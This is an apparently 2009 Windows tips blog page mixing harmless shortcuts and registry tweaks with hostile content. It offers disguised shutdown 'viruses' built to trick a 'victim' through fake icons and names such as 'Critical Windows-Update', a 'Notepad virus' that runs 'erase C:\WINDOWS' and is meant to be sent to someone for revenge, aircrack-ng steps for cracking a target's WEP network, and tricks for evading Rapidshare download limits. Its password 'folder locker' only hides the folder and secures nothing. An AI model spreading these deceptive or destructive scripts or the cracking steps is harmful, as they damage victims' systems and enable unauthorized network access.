Sunday, December 27, 2009

Multiple Login in Yahoo With Any Software

Multiple Login in Yahoo With Any Software

You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these simple steps :


1. Go to Start ----> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test

3.On the right page , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login

Folder Option Missing

Folder Option Missing.

Many of us sometimes find the folder options missing in windows explorer.
Here's the solution--

Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows.

GMAIL SHORTCUTS

GMAIL SHORTCUTS

  • Note: Must have "keyboard shortcuts" on in settings.

  • C: Compose new message.

  • Shift + C: Open new window to compose new message.

  • Slash (/): Switch focus to search box.

  • K: Switch focus to the next most recent email. Enter or "O" opens focused email.

  • J: Switch focus to the next oldest email.

  • N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.

  • P: Switch focus to the previous message.

  • U: Takes you back to the inbox and checks for new mail.

  • Y: Various actions depending on current view:

  • Has no effect in "Sent" and "All Mail" views.

  • Inbox: Archive email or message.

  • Starred: Unstar email or message.

  • Spam: Unmark as spam and move back to "Inbox."

  • Trash: Move back to "Inbox."

  • Any label: Remove the label.

  • X: "Check" an email. Various actions can be performed against all checked emails.

  • S: "Star" an email. Identical to the more familiar term, "flagging."

  • R: Reply to the email.

  • A: Reply to all recipients of the email.

  • F: Forward an email.

  • Shift + R: Reply to the email in a new window.

  • Shift + A: Reply to all recipients of the email in a new window.

  • Shift + F: Forward an email in a new window.

  • Shift + 1 (!): Mark an email as spam and remove it from the inbox.

  • G then I: Switch to "Inbox" view.

  • G then S: Switch to "Starred" view.

  • G then A: Switch to "All Mail" view.

  • G then C: Switch to "Contacts" view.

  • G then S: Switch to "Drafts" view.

Mozilla Firefox Shortcuts

Mozilla Firefox Shortcuts


  • Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.

  • Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.

  • Ctrl + (1-9): Switch to tab corresponding to number.

  • Ctrl + N: New window.

  • Ctrl + T: New tab.

  • Ctrl + L or Alt + D or F6: Switch focus to location bar.

  • Ctrl + Enter: Open location in new tab.

  • Shift + Enter: Open location in new window.

  • Ctrl + K or Ctrl + E: Switch focus to search bar.

  • Ctrl + O: Open a local file.

  • Ctrl + W: Close tab, or window if there's only one tab open.

  • Ctrl + Shift + W: Close window.

  • Ctrl + S: Save page as a local file.

  • Ctrl + P: Print page.

  • Ctrl + F or F3: Open find toolbar.

  • Ctrl + G or F3: Find next...

  • Ctrl + Shift + G or Shift + F3: Find previous...

  • Ctrl + B or Ctrl + I: Open Bookmarks sidebar.

  • Ctrl + H: Open History sidebar.

  • Escape: Stop loading page.

  • Ctrl + R or F5: Reload current page.

  • Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.

  • Ctrl + U: View page source.

  • Ctrl + D: Bookmark current page.

  • Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.

  • Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.

  • Ctrl + Numpad0 or Ctrl + 0: Set text size to default.

  • Alt + Left or Backspace: Back.

  • Alt + Right or Shift + Backspace: Forward.

  • Alt + Home: Open home page.

  • Ctrl + M: Open new message in integrated mail client.

  • Ctrl + J: Open Downloads dialog.

  • F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.

  • Shift + F6: Switch to previous frame.

  • Apostrophe ('): Find link as you type.

  • Slash (/): Find text as you type.

Windows Shortcuts

Windows Shortcuts

  • Shift + F10 right-clicks.

  • Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.

  • Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.

  • Win + Control + F: Open Find dialog. (Computers)

  • Win + U: Open Utility Manager.

  • Win + F1: Open Windows help.

  • Win + Pause: Open System Properties dialog.

  • Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.

  • Win + Shift + Tab: Cycle through taskbar buttons in reverse.

  • Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.

  • Alt + Shift + Tab: Display Cool Switch; go in reverse.

  • Alt + Escape: Send active window to the bottom of the z-order.

  • Alt + Shift + Escape: Activate the window at the bottom of the z-order.

  • Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.

  • Shift while a CD is loading: Bypass AutoPlay.

  • Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)

  • Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.

  • Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.

  • Print screen: Copy screenshot of current screen to clipboard.

  • Alt + Print screen: Copy screenshot of current active window to clipboard.

  • Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.

  • Ctrl + Alt + Up Arrow: Undo inversion.

  • Win + B : Move focus to systray icons.

Increase Broadband Speed Using Simple Tweak

Increase Broadband Speed Using Simple Tweak


A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

8) Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

Lock Folder Without Any Software

Lock Folder Without Any Software

Lock ur folder With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Hide Entire Drives Partition Without Registry :-

Hide Entire Drives Partition Without Registry :-


Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.

DISKPART>

2) Then type "list volume"
The result will look something like one as shown below-


3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".

Rapidshare Hack (NIC Tricks and MAC Cloning) :-

Rapidshare Hack (NIC Tricks and MAC Cloning) :-

Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

[A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

[B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

[C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

[D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait.

Rapidshare Hack

Rapidshare Hack :-


The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.

http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!

Saturday, December 26, 2009

Simple Fake-Virus

  • Understand the following: It's just a harmless "virus". It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.


echo Virus has been executed successfully! echo Have a nice day! shutdown.exe -s -t 10 -c "Your computer has committed suicide. Have a nice day." }}

This code Details

@echo off
color 0a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost - nothing much)
shutdown.exe (shutdowns your pc) -t (time in s) -c "" (Comment)

Preparing the Virus

  1. Read and understand the warnings!
  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
  3. Copy and Paste the Code of the "virus" into Notepad
  4. Click File -> Save as
  5. Decide for a location to save the fake-virus. You should chose a location where the user won't find the file, so saving it on the desktop would be a bad idea!
  6. Change ".txt" to "All files" in the file type drop-down menu
  7. Chose a harmless filename. Replace the ".txt" at the with ".bat"
  8. Click on save and close Notepad.

Making a fake Icon

Now, that we have our Virus saved, we should prepare a decoy:

  1. Right click on the desktop and go over to "new" then click "short cut".
  2. For the location of the short cut chose our Virus.
  3. Click next
  4. Give the shortcut a name that your victim will click on. ("Music for free", "My Documents", "Critical Windows-Update" or "Get Free Cinema-Tickets")
  5. Click on "Finish"
  6. Right click on the shortcut you have just made and chose "properties". Now click on the "chose icon" button and scroll through the list of icons.
  7. Decide for one of the icons that fits well to the name, chose it by clicking on it and hit OK twice.

Shock your Victim

  • Now it's time to sit back and enjoy the show!
  • You should really try not to laugh before the computer shuts down! (Think of sth. said)
  • As the computer goes out, you should check whether your friend is okay and then you may start laughing and start the computer again.

Abort Shutdown-Countdown

Sometimes it might be necessary to stop the countdown before the computer shuts down. Here's how to:

  1. Open the start menu.
  2. Click Run
  3. Type "shutdown.exe -a" and press enter/return.

Cracking a wireless(wi-fi) network

Crack a wireless(wi-fi) network.

It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.


Install aircrack-ng – on Debian Etch by:

"sudo apt-get install aircrack-ng"

Then start aircrack-ng to look for wireless networks:

"sudo airodump-ng eth1"

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

"sudo airodump-ng -c 4 -w dump eth1"

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap"

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

Funny Virus Trick

1. Right click anywhere on the the desktop where you want the icon for your virus to be.

2. Select new and then shortcut.

3. Name the shortcut whatever you want but it is recommended to name it Internet explorer so that you can be assured of your victim using it.

4. Type this in for the destination of the shortcut:

* Shutdown -s -t 30 (but you can put in anything you want)(by the way, it is in seconds)
* -c "your text here" (type anything you want and you do need the "quotes" around what you type)


5. Make it look official by right clicking it. Then click properties and change the icon to the internet explorer icon. Now it should look entirely like the internet browser.

6. Don't forget to change the other internet explorer, or just temporarily remove it

Notepad virus

The only thing you need is Notepad .
Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux)and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.

Fix for COM Surrogate Has Stopped Working Error in Vista

If you've been getting the error COM Surrogate has stopped working whenever you browse folders containing video or media files, you have come to a good place for some possible solutions. This problem is caused because of codecs and other COM components installed by various softwares that aren't fully Vista-compatible, like some versions of DivX or Nero.

Here's the error message:






There are a number of possible solutions to this problem, and the right solution depends greatly on what software is actually causing the problem. Some of the most well-known problem causing softwares are DivX and Nero, but there are others that cause the problem as well.

Possible Solutions

  • If you are using DivX, you should be upgraded to the very latest version (6.5+)
  • If you are using Nero, you can try upgrading to the latest version (7.7.5.1+)
  • If you've upgraded Nero and Divx and still have the problem, you can try renaming the file C:\Program Files\Common Files\Ahead\DSFilter\NeVideo.ax to NeVideo.ax.bak. You may also need to rename NeVideoHD.ax to NeVideoHD.bak
    This will break Nero Showtime, however. (thanks to dugi in the comments for this one)
  • You can disable Thumbnail previews, which should make the problem go away, but isn't the optimal solution.
  • The older ffdshow codec pack has been known to cause some problems. The ffdshow tryouts codec pack seems to work better. Might want to try using this one: http://ffdshow-tryout.sourceforge.net/
  • If you'd like to uninstall Nero entirely, there is a utility that they provide to help with complete uninstall that helps a lot in instances where you have a bad installation of an older version. http://www.nero.com/nero7/eng/FAQs_Nero7_NeroVision.html
  • Some users have recommended installing the Vista Codec Package in order to update all your codecs to the correct versions. I can't confirm that this works because I have not tried it myself. As always, be careful when installing unknown components and create a restore point.
  • You can use the very useful MMCompView free utility from Nirsoft to disable any codecs on the system. This is very useful to help troubleshoot exactly which component is causing the problem.
  • There another possible solution below of turning off DEP for dllhost, which might not work for everybody. You may have to add divx+nero executables to the DEP ignore list.

Alan McC wrote in with this fix that might solve the problem in a much easier way. Essentially, turning off Data Execution Prevention on dllhost (the COM surrogate) can fix this problem for some people. This solution is detailed below.

Right click on Computer, and choose Properties











Click on Advanced System Settings, and then under Advanced, click Settings


















Select the Data Execution Protection tab, and then click Turn on DEP for all programs and services except those I select








Click on the Add button, and then browse to C:\Windows\System32\dllhost.exe as shown











Click Open, and then OK.

Heres what you should see






Now you can browse video folders without problems!

Get os choice menu in dual os

Install Windows XP on Your Pre-Installed Windows Vista Computer

The question I am asked most often is How do I install a dual-boot with Windows XP on my new Windows Vista computer?The answer is that its not that difficult, its just very time consuming, and you need to own a copy of Windows XP.

Note that you should not attempt this if you aren't ready to troubleshoot any problems that might occur.

The first issue we encounter is that computers with pre-installed operating systems take up the entire drive. Luckily Microsoft included the Shrink volume feature in Vista, so we can easily shrink the Vista partition down to make room for XP.

Open the Computer Management panel, which you can find under Administrative tools or by right-clicking the Computer item in the start menu and choosing Manage. Find the Disk Management item in the list and select that.















Now we'll shrink our volume down by right-clicking on the main hard drive and choosing Shrink Volume.
















Now you can choose the size that you want to shrink, which really means you are choosing the size that you want your XP partition to be. Whatever you do, don't just use the default. I chose roughly 10gb by entering 10000 into the amount.













The next step might be confusing, because we need to change the cd-rom drive thats invariably taking up D: at the moment, because we want to use D: for the Windows XP partition, but it's already taken by the cd-rom drive. If you skip this step than XP will install onto the E: drive, which isn't the end of the world, but it's not quite as tidy.

Right-click on the cd-rom drive in the list and choose Change Drive Letter and Paths from the menu.















Now we'll change the CD drive to use E: by selecting that in the drop-down.














Now we can create a new partition for XP to live on and make sure that the drive letter is set the way we want. If you do not create a partition now the XP install will do so automatically, but its easier and cleaner to do it this way.

Right-click on the Unallocated free space area and then select New Simple Volume from the menu.








Follow through the wizard and select whatever options you'd like, making sure to use D: as the drive letter.

Now you will need to close out of disk management and reboot your computer. This is because we can't do the next step until we reboot. (you can try, but it won't work)

So we've come back from rebooting open up Computer from the start menu and then right-click on the D: drive and select properties. Give your partition a meaningful name like . It would be wise to name the C: drive to Vista at this point as well.











Now you'll want to pop your XP cd into the drive and boot off it. You may have to configure your BIOS to enable booting off the CD drive, or if your computer says something like Hit Esc for boot menu you might want to use that.

Once you come to the screen where you can choose the partition to install on, then choose either the unpartitioned space or the new partition you created. Whatever you do, donâ't try and install onto your Vista partition! See how much cleaner it is now that we've labeled each partition distinctly?













We'll assume XP is completely installed at this point, and you will have lost your ability to boot into Windows Vista, so we'll need to use the VistaBootPro utility to restore the Vista boot loader.

Update: VistaBootPro is no longer free, but you can still download the free version.

During the install you'll be forced to install the .NET 2.0 framework. Open up VistaBootPRO and then click on the System Bootloader tab. Check the Windows Vista Bootloader and then All Drive radio buttons, and then click on the Install Bootloader button.




















At this point, the Windows Vista bootloader is installed and you'll only be able to boot into Vista, but we'll fix that. Instead of manually doing the work, we'll just click the Diagnostics menu item and then choose Run Diagnostics from the menu.










This will scan your computer and then automatically fill in the XP version.. click on the Manage OS Entire tab and then click in the textbox for Rename OS Entry, and name it something useful like Windows XP or œThe Windows That Works




















Click the Apply Updates button and then reboot your computer you should see your shiny new boot manager with both operating systems in the list!











If you get an error saying unable to find ntldr when trying to boot XP, you'll need to do the following:

* Find the hidden files ntldr and ntdetect.com in the root of your Vista drive and copy them to the root of your XP drive.
* If you can't find the files there, you can find them in the \i386\ folder on your XP install cd.

GOOGLE

Crack Search

Hit Counter

Sign by Dealighted - Black Friday Thanksgiving Deals